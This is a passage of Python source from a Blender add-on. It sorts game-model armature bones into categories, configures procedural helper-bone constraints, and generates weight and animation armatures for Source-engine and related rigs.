elif bone.title().count('Wrist0'):
self.helper_bones['viewmodel']['wrist_extra'].append(bone)
self.helper_bones['viewmodel']['wrist_extra'].sort()
continue
elif bone.title().count('Wrist_Helper1'):
self.helper_bones['viewmodel']['wrist_helper1'].append(bone)
self.helper_bones['viewmodel']['wrist_helper1'].sort()
continue
elif bone.title().count('Wrist_Helper2'):
self.helper_bones['viewmodel']['wrist_helper2'].append(bone)
self.helper_bones['viewmodel']['wrist_helper2'].sort()
continue
elif bone.title().count('Thumbroot'):
self.helper_bones['viewmodel']['thumbroot'].append(bone)
self.helper_bones['viewmodel']['thumbroot'].sort()
continue
elif bone.title().count('Thumb_Fix'):
self.helper_bones['viewmodel']['thumbfix'].append(bone)
self.helper_bones['viewmodel']['thumbfix'].sort()
continue
if vatinfo.titanfall:
arms = [None, 'Shouldertwist', 'Shouldermid', 'Elbowb', None, 'Forearm']
legs = [None, 'Kneeb']
elif vatinfo.sbox:
arms = [None, None, 'Arm_Upper', 'Arm_Elbow_Helper', None, 'Arm_Lower']
legs = ['Leg_Upper', 'Leg_Knee_Helper']
if bone.title().count('Leg_Lower'):
self.helper_bones['legs'].setdefault('lowerleg', [])
self.helper_bones['legs']['lowerleg'].append(bone)
self.helper_bones['legs']['lowerleg'].sort()
continue
else:
arms = ['Trap', 'Shoulder', 'Bicep', 'Elbow', 'Ulna', 'Wrist']
legs = ['Quad', 'Knee']
#Louis exclusive helper bone
if bone.title().count('Shoulder1'):
self.helper_bones['arms'].setdefault('shoulder1', [])
self.helper_bones['arms']['shoulder1'].append(bone)
self.helper_bones['arms']['shoulder1'].sort()
continue
if arms[0]:
if bone.title().count(arms[0]):
self.helper_bones['arms']['trapezius'].append(bone)
self.helper_bones['arms']['trapezius'].sort()
continue
if arms[1]:
if bone.title().count(arms[1]):
self.helper_bones['arms']['shoulder'].append(bone)
self.helper_bones['arms']['shoulder'].sort()
continue
if arms[2]:
if bone.title().count(arms[2]):
self.helper_bones['arms']['bicep'].append(bone)
self.helper_bones['arms']['bicep'].sort()
continue
if arms[3]:
if bone.title().count(arms[3]):
self.helper_bones['arms']['elbow'].append(bone)
self.helper_bones['arms']['elbow'].sort()
continue
if arms[4]:
if bone.title().count(arms[4]):
self.helper_bones['arms']['ulna'].append(bone)
self.helper_bones['arms']['ulna'].sort()
continue
if arms[5]:
if bone.title().count(arms[5]):
self.helper_bones['arms']['wrist'].append(bone)
self.helper_bones['arms']['wrist'].sort()
continue
if legs[0]:
if bone.title().count(legs[0]):
self.helper_bones['legs']['quadricep'].append(bone)
self.helper_bones['legs']['quadricep'].sort()
continue
if legs[1]:
if bone.title().count(legs[1]):
self.helper_bones['legs']['knee'].append(bone)
self.helper_bones['legs']['knee'].sort()
continue
#Creates pairs for helper bones that aren't the conventional
prefix, bone2 = bone_convert(bone)
if bone2.title().startswith(self.side[0]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[0], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[0], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[0], '').casefold()].sort()
elif bone2.title().endswith(self.side[2]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[2], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[2], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[2], '').casefold()].sort()
elif bone2.title().startswith('Left_'):
self.helper_bones['others'].setdefault(bone.title().replace('Left_', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('Left_', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('Left_', '').casefold()].sort()
elif bone2.title().endswith('_Left'):
self.helper_bones['others'].setdefault(bone.title().replace('_Left', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('_Left', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('_Left', '').casefold()].sort()
elif bone2.title().startswith(self.side[1]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[1], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[1], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[1], '').casefold()].sort()
elif bone2.title().endswith(self.side[3]):
self.helper_bones['others'].setdefault(bone2.title().replace(self.side[3], '').casefold(), [])
self.helper_bones['others'][bone2.title().replace(self.side[3], '').casefold()].append(bone)
self.helper_bones['others'][bone2.title().replace(self.side[3], '').casefold().casefold()].sort()
elif bone2.title().startswith('Right_'):
self.helper_bones['others'].setdefault(bone.title().replace('Right_', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('Right_', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('Right_', '').casefold()].sort()
elif bone2.title().endswith('_Right'):
self.helper_bones['others'].setdefault(bone.title().replace('_Right', '').casefold(), [])
self.helper_bones['others'][bone.title().replace('_Right', '').casefold()].append(bone)
self.helper_bones['others'][bone.title().replace('_Right', '').casefold()].sort()
else:
self.helper_bones['others']['others'].append(bone)
self.helper_bones['others']['others'].sort()
##Other bones##
if other_bones_raw:
for bone in other_bones_raw:
#Titanfall
if vatinfo.titanfall:
if bone.count('ja'):
self.other_bones['attachment'].append(bone)
self.other_bones['attachment'].sort()
elif bone.startswith('jx'):
self.other_bones['others'].append(bone)
self.other_bones['others'].sort()
else:
custom_bones_raw.append(bone)
elif vatinfo.sbox:
if bone.casefold().count('ik'):
self.other_bones.setdefault('ik', [])
self.other_bones['ik'].append(bone)
self.other_bones['ik'].sort()
else:
if bone.title().count('Forward'):
self.other_bones['forward'].append(bone)
self.other_bones['forward'].sort()
elif bone.title().count('Weapon') or bone.title().count('Muzzle') or bone.title().count('Shell'):
self.other_bones['weapon'].append(bone)
self.other_bones['weapon'].sort()
elif bone.startswith('a1.') or bone.startswith('a2.'):
self.other_bones['attachment'].append(bone)
self.other_bones['attachment'].sort()
elif bone.title().count('Bip01'):
self.central_bones['pelvis'].append(bone)
self.central_bones['pelvis'].sort()
elif bone.title().count('Camera'):
self.other_bones['viewmodel'].append(bone)
self.other_bones['viewmodel'].sort()
elif bone.title().count('Jiggle') or bone.title().count('Jiggy'):
self.custom_bones['jiggle'].append(bone)
self.custom_bones['jiggle'].sort()
else:
self.other_bones['others'].append(bone)
self.other_bones['others'].sort()
##Custom bones##
if custom_bones_raw:
for bone in custom_bones_raw:
if bone.title().count('Jiggle'):
self.custom_bones['jiggle'].append(bone)
self.custom_bones['jiggle'].sort()
elif bone.title().startswith(self.side[0]):
self.custom_bones.setdefault(bone.title().replace(self.side[0], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[0], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[0], '').casefold()].sort()
elif bone.title().endswith(self.side[2]):
self.custom_bones.setdefault(bone.title().replace(self.side[2], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[2], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[2], '').casefold()].sort()
elif bone.title().startswith('Left_'):
self.custom_bones.setdefault(bone.title().replace('Left_', '').casefold(), [])
self.custom_bones[bone.title().replace('Left_', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('Left_', '').casefold()].sort()
elif bone.title().endswith('_Left'):
self.custom_bones.setdefault(bone.title().replace('_Left', '').casefold(), [])
self.custom_bones[bone.title().replace('_Left', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('_Left', '').casefold()].sort()
elif bone.title().startswith(self.side[1]):
self.custom_bones.setdefault(bone.title().replace(self.side[1], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[1], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[1], '').casefold()].sort()
elif bone.title().endswith(self.side[3]):
self.custom_bones.setdefault(bone.title().replace(self.side[3], '').casefold(), [])
self.custom_bones[bone.title().replace(self.side[3], '').casefold()].append(bone)
self.custom_bones[bone.title().replace(self.side[3], '').casefold()].sort()
elif bone.title().startswith('Right_'):
self.custom_bones.setdefault(bone.title().replace('Right_', '').casefold(), [])
self.custom_bones[bone.title().replace('Right_', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('Right_', '').casefold()].sort()
elif bone.title().endswith('_Right'):
self.custom_bones.setdefault(bone.title().replace('_Right', '').casefold(), [])
self.custom_bones[bone.title().replace('_Right', '').casefold()].append(bone)
self.custom_bones[bone.title().replace('_Right', '').casefold()].sort()
else:
self.custom_bones['others'].append(bone)
self.custom_bones['others'].sort()
##Creates empty pairs for single bones##
for cat in self.symmetrical_bones.keys():
for container in self.symmetrical_bones[cat].keys():
if len(self.symmetrical_bones[cat][container]) == 1:
bone = self.symmetrical_bones[cat][container][0]
prefix, bone = bone_convert(bone)
if bone.title().startswith(self.side[0]) or bone.title().endswith(self.side[2]):
self.symmetrical_bones[cat][container].insert(1, None)
elif bone.title().startswith(self.side[1]) or bone.title().endswith(self.side[3]):
self.symmetrical_bones[cat][container].insert(0, None)
for cat in self.helper_bones.keys():
for container in self.helper_bones[cat].keys():
if len(self.helper_bones[cat][container]) == 1:
bone = self.helper_bones[cat][container][0]
prefix, bone = bone_convert(bone)
if bone.title().startswith(self.side[0]) or bone.title().endswith(self.side[2]):
self.helper_bones[cat][container].insert(1, None)
elif bone.title().startswith(self.side[1]) or bone.title().endswith(self.side[3]):
self.helper_bones[cat][container].insert(0, None)
else: #Nick left wrist fix
self.helper_bones[cat][container].insert(1, None)
if len(self.helper_bones['arms']['wrist']) == 2:
#Position fix for Nick's left wrist
if self.helper_bones['arms']['wrist'][1] == 'h2.wrist':
self.helper_bones['arms']['wrist'].sort(reverse=True)
for bone in self.full_bonelist:
bone = armature.pose.bones[bone]
if bone.bone.use_connect:
vatinfo.unconverted_armature = True
break
#Final bone report
if report:
print("Symmetrical bones:", list(self.symmetrical_bones.values()))
print("Central bones:", list(self.central_bones.values()))
print("Helper bones:", list(self.helper_bones.values()))
print("Other bones:", list(self.other_bones.values()))
print("Custom bones:", self.custom_bones)
else:
vatinfo.scheme = -1
#print(symmetrical_bones_raw)
#print(central_bones_raw)
#print(helper_bones_raw)
#print(other_bones_raw)
#print(custom_bones_raw)
##Relative unit##
def get_unit(self):
vatinfo = bpy.context.scene.vatinfo
#Equivalent to 1 meter relative to the first bone's length in order to maintain consistency between different scales
if not vatinfo.unit:
armature = self.armature
unit_bone = armature.pose.bones[0].length
#if vatinfo.goldsource:
# vatinfo.unit = unit_bone*209.97500305553845
if vatinfo.goldsource:
vatinfo.unit = unit_bone*4.36085145847641
elif vatinfo.sbox:
vatinfo.unit = unit_bone*0.09201296705261927
else:
vatinfo.unit = unit_bone*5.356327005986801
print('Relative unit:', vatinfo.unit)
#Unit relative to the size it would be if imported from Blender Source Tools for Source armatures (For the sake of readability)
def get_armatures(self): #Gets generated armatures for selected armature
vatinfo = bpy.context.scene.vatinfo
def get_weight_armature():
try:
self.weight_armature = bpy.data.objects[self.armature.name + '.weight']
vatinfo.weight_armature = True
except:
vatinfo.weight_armature = False
try:
self.weight_armature_real = bpy.data.armatures[self.armature_real.name + '.weight']
vatinfo.weight_armature = True
except:
vatinfo.weight_armature = False
def get_anim_armature():
#Checks if it's a setup armature or a proper armature
try:
try:
self.animation_armature = bpy.data.objects[self.armature.name + '.anim_setup']
vatinfo.animation_armature_setup = True
except:
self.animation_armature = bpy.data.objects[self.armature.name + '.anim']
vatinfo.animation_armature_setup = False
try:
self.animation_armature_real = bpy.data.armatures[self.armature_real.name + '.anim_setup']
vatinfo.animation_armature_setup = True
except:
self.animation_armature_real = bpy.data.armatures[self.armature_real.name + '.anim']
vatinfo.animation_armature_setup = False
vatinfo.animation_armature = True
except:
vatinfo.animation_armature = False
get_weight_armature()
get_anim_armature()
def get_constraints(self): #Gets previously added constraints that have not been removed
vatinfo = bpy.context.scene.vatinfo
armature = self.armature
for cat in self.symmetrical_bones.keys():
for bone in self.symmetrical_bones[cat].values():
for bone in bone:
if bone:
if vatinfo.symmetry:
break
else:
prefix, bone = bone_convert(bone)
if bone.startswith(self.side[0]) or bone.endswith(self.side[2]):
for constraint in armature.pose.bones[prefix + bone].constraints:
if constraint.name == 'Constraint Symmetry Location' or constraint.name == 'Constraint Symmetry Rotation':
vatinfo.symmetry = 1
break
else:
vatinfo.symmetry = 0
elif bone.startswith(self.side[1]) or bone.endswith(self.side[3]):
for constraint in armature.pose.bones[prefix + bone].constraints:
if constraint.name == 'Constraint Symmetry Location' or constraint.name == 'Constraint Symmetry Rotation':
vatinfo.symmetry = 2
break
else:
vatinfo.symmetry = 0
for cat in self.helper_bones.keys():
for bone in self.helper_bones[cat].values():
for bone in bone:
if bone:
if vatinfo.symmetry:
break
else:
prefix, bone = bone_convert(bone)
if bone.startswith(self.side[0]) or bone.endswith(self.side[2]):
for constraint in armature.pose.bones[prefix + bone].constraints:
if constraint.name == 'Constraint Symmetry Location' or constraint.name == 'Constraint Symmetry Rotation':
vatinfo.symmetry = 1
break
else:
vatinfo.symmetry = 0
elif bone.startswith(self.side[1]) or bone.endswith(self.side[3]):
for constraint in armature.pose.bones[prefix + bone].constraints:
if constraint.name == 'Constraint Symmetry Location' or constraint.name == 'Constraint Symmetry Rotation':
vatinfo.symmetry = 2
break
else:
vatinfo.symmetry = 0
def set_groups(self): #Organizes bones by bone group and bone layers
armature = self.armature
#Checks if any groups exist already
group = armature.pose.bone_groups.keys()
if not group:
#Creates groups and sets their color
for group, color in zip(['Center', 'Left Arm', 'Right Arm', 'Left Leg', 'Right Leg', 'Helpers', 'Attachments', 'Weapon', 'Others', 'Custom'], ['THEME03', 'THEME01', 'THEME04', 'THEME01', 'THEME04', 'THEME09', 'THEME14', 'THEME07', 'THEME10', 'THEME06']):
armature.pose.bone_groups.new(name=group)
armature.pose.bone_groups[group].color_set = color
for cat in self.symmetrical_bones.keys():
#Arms and fingers
if cat == 'arms' or cat == 'fingers':
for bone in self.symmetrical_bones[cat].values():
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
if index == 0:
armature.pose.bones[prefix + bone].bone_group_index = 1
armature.data.bones[prefix + bone].layers[1] = True
elif index == 1:
armature.pose.bones[prefix + bone].bone_group_index = 2
armature.data.bones[prefix + bone].layers[2] = True
armature.data.bones[prefix + bone].layers[0] = False
#Legs
elif cat == 'legs':
for bone in self.symmetrical_bones[cat].values():
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
if index == 0:
armature.pose.bones[prefix + bone].bone_group_index = 3
armature.data.bones[prefix + bone].layers[3] = True
elif index == 1:
armature.pose.bones[prefix + bone].bone_group_index = 4
armature.data.bones[prefix + bone].layers[4] = True
armature.data.bones[prefix + bone].layers[0] = False
for bone in self.central_bones.values():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
armature.pose.bones[prefix + bone].bone_group_index = 0
if self.helper_bones:
for cat in self.helper_bones.keys():
for bone in self.helper_bones[cat].values():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
armature.pose.bones[prefix + bone].bone_group_index = 5
armature.data.bones[prefix + bone].layers[5] = True
armature.data.bones[prefix + bone].layers[0] = False
for container, bone in self.other_bones.items():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
if container == 'attachment':
armature.pose.bones[prefix + bone].bone_group_index = 6
armature.data.bones[prefix + bone].layers[6] = True
armature.data.bones[prefix + bone].layers[0] = False
elif container == 'weapon':
armature.pose.bones[prefix + bone].bone_group_index = 7
armature.data.bones[prefix + bone].layers[7] = True
armature.data.bones[prefix + bone].layers[0] = False
else:
armature.pose.bones[prefix + bone].bone_group_index = 8
armature.data.bones[prefix + bone].layers[8] = True
armature.data.bones[prefix + bone].layers[0] = False
#Custom bones
for bone in self.custom_bones.values():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
armature.pose.bones[prefix + bone].bone_group_index = 9
armature.data.bones[prefix + bone].layers[9] = True
armature.data.bones[prefix + bone].layers[0] = False
#Reveals used layers
for i in [0,1,2,3,4,5,6,7,8, 9]:
armature.data.layers[i] = True
print("Bone groups set!")
def set_helper_bones(self):
vatproperties = bpy.context.scene.vatproperties
vatinfo = bpy.context.scene.vatinfo
armature = self.armature
new = False
for cat in self.helper_bones.keys():
for container, bone in self.helper_bones[cat].items():
if container == 'wrist' or container == 'ulna' or container == 'elbow' or container == 'knee' or container == 'quadricep' or container == 'shoulder' or container == 'thumbroot' or container == 'forearm_driven':
for index, bone in enumerate(bone):
if bone:
if index > 1:
break
prefix, bone = bone_convert(bone)
#Adds transforms to only these helper bones unless already existing
try:
armature.pose.bones[prefix + bone].constraints['Procedural Bone']
except:
transform = armature.pose.bones[prefix + bone].constraints.new('TRANSFORM')
new = True
#Initial parameters
transform.name = "Procedural Bone"
transform.target = self.armature
transform.map_from = 'ROTATION'
transform.map_to = 'ROTATION'
transform.target_space = 'LOCAL'
transform.owner_space = 'LOCAL'
#Hand rotation
if container == 'wrist' or container == 'ulna' or container == 'forearm_driven':
if vatinfo.special_viewmodel:
transform.from_min_y_rot = radians(-90)
transform.from_max_y_rot = radians(90)
else:
transform.from_min_x_rot = radians(-90)
transform.from_max_x_rot = radians(90)
prefix, bone = bone_convert(self.symmetrical_bones['arms']['hand'][index])
transform.subtarget = prefix + bone
if container == 'wrist':
transform.to_min_x_rot = radians(-75)
transform.to_max_x_rot = radians(75)
elif container == 'ulna':
if vatinfo.special_viewmodel:
transform.to_min_y_rot = radians(-50)
transform.to_max_y_rot = radians(50)
else:
transform.to_min_x_rot = radians(-50)
transform.to_max_x_rot = radians(50)
elif container == 'forearm_driven':
transform.to_min_x_rot = radians(-25)
transform.to_max_x_rot = radians(20)
#Forearm and thigh rotation
elif container == 'elbow' or container == 'knee' or container == 'quadricep':
if vatinfo.titanfall and container == 'elbow':
transform.from_min_y_rot = radians(-90)
transform.from_max_y_rot = radians(90)
transform.to_min_y_rot = radians(-45)
transform.to_max_y_rot = radians(45)
else:
transform.from_min_z_rot = radians(-90)
transform.from_max_z_rot = radians(90)
transform.to_min_z_rot = radians(-45)
transform.to_max_z_rot = radians(45)
if container == 'elbow':
prefix, bone = bone_convert(self.symmetrical_bones['arms']['forearm'][index])
transform.subtarget = prefix + bone
elif container == 'knee':
prefix, bone = bone_convert(self.symmetrical_bones['legs']['calf'][index])
transform.subtarget = prefix + bone
elif container == 'quadricep':
if not vatinfo.sbox:
prefix, bone = bone_convert(self.symmetrical_bones['legs']['thigh'][index])
transform.subtarget = prefix + bone
elif container == 'shoulder':
#Not for Titanfall characters
if not vatinfo.titanfall:
transform.from_min_y_rot = radians(-45)
transform.from_max_y_rot = radians(45)
#Nick exclusive
if self.helper_bones['arms']['wrist'] and self.helper_bones['arms']['wrist'][0] == 'h2.wrist':
transform.to_min_y_rot = radians(45)
transform.to_max_y_rot = radians(-45)
else:
transform.to_min_y_rot = radians(5)
transform.to_max_y_rot = radians(-5)
prefix, bone = bone_convert(self.symmetrical_bones['arms']['upperarm'][index])
transform.subtarget = prefix + bone
elif container == 'thumbroot':
transform.from_min_y_rot = radians(-45)
transform.from_max_y_rot = radians(45)
transform.from_min_z_rot = radians(-75)
transform.from_max_z_rot = radians(75)
if index == 0:
transform.to_min_y_rot = radians(30)
transform.to_max_y_rot = radians(-30)
else:
transform.to_min_y_rot = radians(-30)
transform.to_max_y_rot = radians(30)
transform.to_min_z_rot = radians(-45)
transform.to_max_z_rot = radians(45)
prefix, bone = bone_convert(self.symmetrical_bones['fingers']['finger0'][index])
transform.subtarget = prefix + bone
if new:
print("Procedural bones configured!")
if vatinfo.viewmodel:
vatproperties.bake_helper_bones = True
else:
vatproperties.bake_helper_bones = False
#Some functions (Namely creating new bones) do not add the newly created info to the object data until a mode change occurs at least once
def update(type, object=None):
if type == 0: #Simple update, used for making new bones show up in data
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.mode_set(mode='EDIT')
elif type == 1 and object: #Used to work with edit_bones, since it's not possible to use in anything other than edit mode
bpy.ops.object.mode_set(mode='OBJECT')
bpy.ops.object.select_all(action='DESELECT') #You're required to be in edit mode to use 'data.edit_bones', else there will be no bone info given.
object.select_set(True)
bpy.context.view_layer.objects.active = object
bpy.ops.object.mode_set(mode='EDIT')
def convert_armature_to_source():
vatproperties = bpy.context.scene.vatproperties
pass
def generate_armature(type, action): #Creates or deletes the weight armature
vatinfo = bpy.context.scene.vatinfo
real_armature = bpy.data.armatures[arm.armature_real.name]
unit = vatinfo.unit
#Creation
if action == 0:
#Weight armature datablock
if type == 'weight':
arm.weight_armature_real = real_armature.copy()
arm.weight_armature_real.name = arm.armature_real.name + '.weight'
#Creation and link to current scene
arm.weight_armature = bpy.data.objects.new(arm.armature.name + '.weight', arm.weight_armature_real)
vatinfo.weight_armature = True
collection = arm.armature.users_collection[0]
collection.objects.link(arm.weight_armature)
armature = arm.weight_armature
#Animation armature datablock
elif type == 'anim':
arm.animation_armature_real = real_armature.copy()
arm.animation_armature_real.name = arm.armature_real.name + '.anim_setup'
#Creation and link to current scene
arm.animation_armature = bpy.data.objects.new(arm.armature.name + '.anim_setup', arm.animation_armature_real)
vatinfo.animation_armature = True
collection = arm.armature.users_collection[0]
collection.objects.link(arm.animation_armature)
armature = arm.animation_armature
#Focuses on newly created armature
update(1, armature)
##Unimportant bone removal##
#Removes bones such as weapon or attachment bones
if arm.other_bones:
for container, bone in arm.other_bones.items():
for bone in bone:
if bone:
if container == 'forward' or container == 'root' or container == 'ik' or bone == 'p2.ValveBiped':
prefix, bone = bone_convert(bone)
bone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(bone)
elif type == 'weight':
prefix, bone = bone_convert(bone)
bone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(bone)
#Keeps only the bare minimum bones for Rigify
if type == 'anim':
for cat in arm.helper_bones.keys():
for container, bone in arm.helper_bones[cat].items():
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(ebone)
elif type == 'weight':
#Removes wrist helpers for viewmodels since i've never seen them used for anything and they mess with weight generation
for container, bone in arm.helper_bones['viewmodel'].items():
if container != 'thumbroot' and container != 'forearm_driven':
for bone in bone:
if bone:
prefix, bone = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone]
armature.data.edit_bones.remove(ebone)
##Setup for armatures, tweaking bone positions and the like##
arm.chainless_bones = []
arm.chain_start = []
#Temporal list with prefixes taken out
custom_bones = []
for cat in arm.custom_bones.keys():
for bone in arm.custom_bones[cat]:
if bone:
prefix, bone = bone_convert(bone)
custom_bones.append(bone)
#Custom bones, placed first so changes to the standard bones by them are overwritten later
for cat in arm.custom_bones.keys():
for bone in arm.custom_bones[cat]:
if bone:
prefix, bone2 = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone2]
pbone = armature.pose.bones[prefix + bone2]
marked = False
if ebone.parent:
parent = ebone.parent.name
if custom_bones.count(parent.replace(prefix, '')):
marked = True
parent = ebone.parent
#If bone's parent is not any of the default ones
if marked:
#Avoids Blender deleting the bone if the connection causes the child bone to have virtually 0 length
if ebone.tail != parent.tail and ebone.head != parent.head:
parent.tail = pbone.head
#Straightens the first bone of a line
if not ebone.children:
length = parent.length
parent.length = parent.length*2
ebone.tail = parent.tail
parent.length = length
if len(parent.children) < 2:
ebone.use_connect = True
if not ebone.use_connect and ebone.children:
arm.chain_start.append(bone)
else:
if not ebone.children:
arm.chainless_bones.append(bone)
if ebone.length < 0.3*unit:
pbone.rotation_quaternion[3] = -1
pbone.scale = 5,5,5
if not ebone.use_connect and ebone.children:
if type == 'anim':
pbone.rigify_type = 'basic.super_copy'
pbone.rigify_parameters.super_copy_widget_type = 'bone'
#arm.chain_start.append(bone)
#Isolated bones for the custom bones
if type == 'anim':
for cat in arm.custom_bones.keys():
for bone in arm.custom_bones[cat]:
if bone:
prefix, bone2 = bone_convert(bone)
ebone = armature.data.edit_bones[prefix + bone2]
pbone = armature.pose.bones[prefix + bone2]
#Creates copy of bone that retains the original rotation for the retarget empties
isolatedbone = armature.data.edit_bones.new(prefix + bone2 + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone2].head
isolatedbone.tail = armature.pose.bones[prefix + bone2].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone2].roll
isolatedbone.parent = armature.data.edit_bones[prefix + bone2]
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
#Symmetrical bones
for cat in arm.symmetrical_bones.keys():
for container, bone in arm.symmetrical_bones[cat].items():
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
if type == 'anim':
#Creates copy of bone that retains the original rotation for the retarget empties
if vatinfo.scheme == 0 and not vatinfo.sbox:
bone2 = armature_rename.bone_rename(1, bone, index)
isolatedbone = armature.data.edit_bones.new(prefix + bone2 + ".isolated")
else:
isolatedbone = armature.data.edit_bones.new(prefix + bone + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone].head
isolatedbone.tail = armature.pose.bones[prefix + bone].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone].roll
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
ebone = armature.data.edit_bones[prefix + bone]
pbone = armature.pose.bones[prefix + bone]
parent = ebone.parent
if arm.central_bones['pelvis']:
prefix, bone = bone_convert(arm.central_bones['pelvis'][0])
if parent.name == prefix + bone:
continue
else:
parent.tail = pbone.head
else:
parent.tail = pbone.head
#Filters out bones whose parent should not be connected to them
if container == 'thigh' or container == 'clavicle' or container == 'finger0' or container == 'finger1' or container == 'finger2' or container == 'finger3' or container == 'finger4' or container == 'fingercarpal' or container == 'indexmeta' or container == 'middlemeta' or container == 'ringmeta':
continue
else:
if type == 'weight':
if container == 'calf' or container == 'upperarm' or container == 'forearm' or container == 'hand':
continue
elif vatinfo.sbox and container == 'foot':
continue
ebone.use_connect = True
#Helper bones tweak if weight armature
if type == 'weight':
for cat in arm.helper_bones.keys():
for container, bone in arm.helper_bones[cat].items():
for bone in bone:
if bone:
if container.count('thumb') or container.count('wrist') or container.count('ulna') or container.count('forearm'):
continue
prefix, bone = bone_convert(bone)
pbone = armature.pose.bones[prefix + bone]
ebone = armature.data.edit_bones[prefix + bone]
parent = armature.data.edit_bones[prefix + bone].parent
if cat != 'others':
parent.tail = pbone.head
#Filters out bones whose parent should not be connected to them
if container == 'knee' or container == 'elbow' or container == 'quadricep' or container == 'bicep' or container == 'shoulder' or cat == 'others':
continue
else:
ebone.use_connect = True
#Central bones
for container, bone in arm.central_bones.items():
for index, bone in enumerate(bone):
if bone:
prefix, bone = bone_convert(bone)
if type == 'anim':
#Creates copy of bone that retains the original rotation for the retarget empties
isolatedbone = armature.data.edit_bones.new(prefix + bone + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone].head
isolatedbone.tail = armature.pose.bones[prefix + bone].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone].roll
isolatedbone.parent = armature.data.edit_bones[prefix + bone]
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
pbone = armature.pose.bones[prefix + bone]
ebone = armature.data.edit_bones[prefix + bone]
#No parent
if container != 'pelvis':
if armature.data.edit_bones[prefix + bone].parent:
parent = armature.data.edit_bones[prefix + bone].parent
if arm.central_bones['pelvis']:
prefix, bone = bone_convert(arm.central_bones['pelvis'][0])
if parent.name == prefix + bone and container != 'spine':
continue
else:
parent.tail = pbone.head
else:
parent.tail = pbone.head
#Neck should not be connected to its parent
if container.count('neck') == 0:
ebone.use_connect = True
#Extends head's length to be on par with actual head height
if container == 'head':
if vatinfo.goldsource: #Update the remaining 2 to *unit
ebone.tail.xyz = pbone.head.x, pbone.head.y, pbone.head.z + 10*unit
elif vatinfo.sbox:
ebone.tail.xyz = pbone.head.x, pbone.head.y, pbone.head.z + 35*unit
else:
ebone.tail.xyz = pbone.head.x, pbone.head.y, pbone.head.z + 6*unit
if type == 'anim':
for container, bone in arm.other_bones.items():
if container == 'weapon' or container == 'viewmodel':
for bone in bone:
if bone:
if container == 'weapon' or bone.title().count('Camera'):
prefix, bone = bone_convert(bone)
#Creates copy of bone that retains the original rotation for the retarget empties
isolatedbone = armature.data.edit_bones.new(prefix + bone + ".isolated")
isolatedbone.head = armature.pose.bones[prefix + bone].head
isolatedbone.tail = armature.pose.bones[prefix + bone].tail
isolatedbone.roll = armature.data.edit_bones[prefix + bone].roll
isolatedbone.parent = armature.data.edit_bones[prefix + bone]
isolatedbone.use_deform = False
isolatedbone.layers[28] = True
for i in range(0, 11):
isolatedbone.layers[i] = False
##Bone tweaks##
#Extends toe tip to be where the actual tip should be
for index, bone in enumerate(arm.symmetrical_bones['legs']['toe0']):
if bone:
prefix, bone = bone_convert(bone)
etoe = armature.data.edit_bones[prefix + bone]
ptoe = armature.pose.bones[prefix + bone]
if arm.symmetrical_bones['legs'].get('toe01') and arm.symmetrical_bones['legs']['toe01'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['toe01'][index])
etoe01 = armature.data.edit_bones[prefix + bone]
if arm.symmetrical_bones['legs'].get('toe02') and arm.symmetrical_bones['legs']['toe02'][index]:
prefix, bone = bone_convert(arm.symmetrical_bones['legs']['toe02'][index])
etoe02 = armature.data.edit_bones[prefix + bone]
length = etoe01.length
etoe01.length = etoe01.length*1.25
etoe02.tail = etoe01.tail
etoe01.length = length
else:
length = etoe.length
etoe.length = etoe.length*1.25
etoe01.tail = etoe.tail
etoe.length = length
else:
if vatinfo.sbox:
armature.data.edit_bones[prefix + bone].tail.xyz = ptoe.head.x, -8*unit, ptoe.head.z
elif arm.symmetrical_bones['legs'].get('thighlow'):
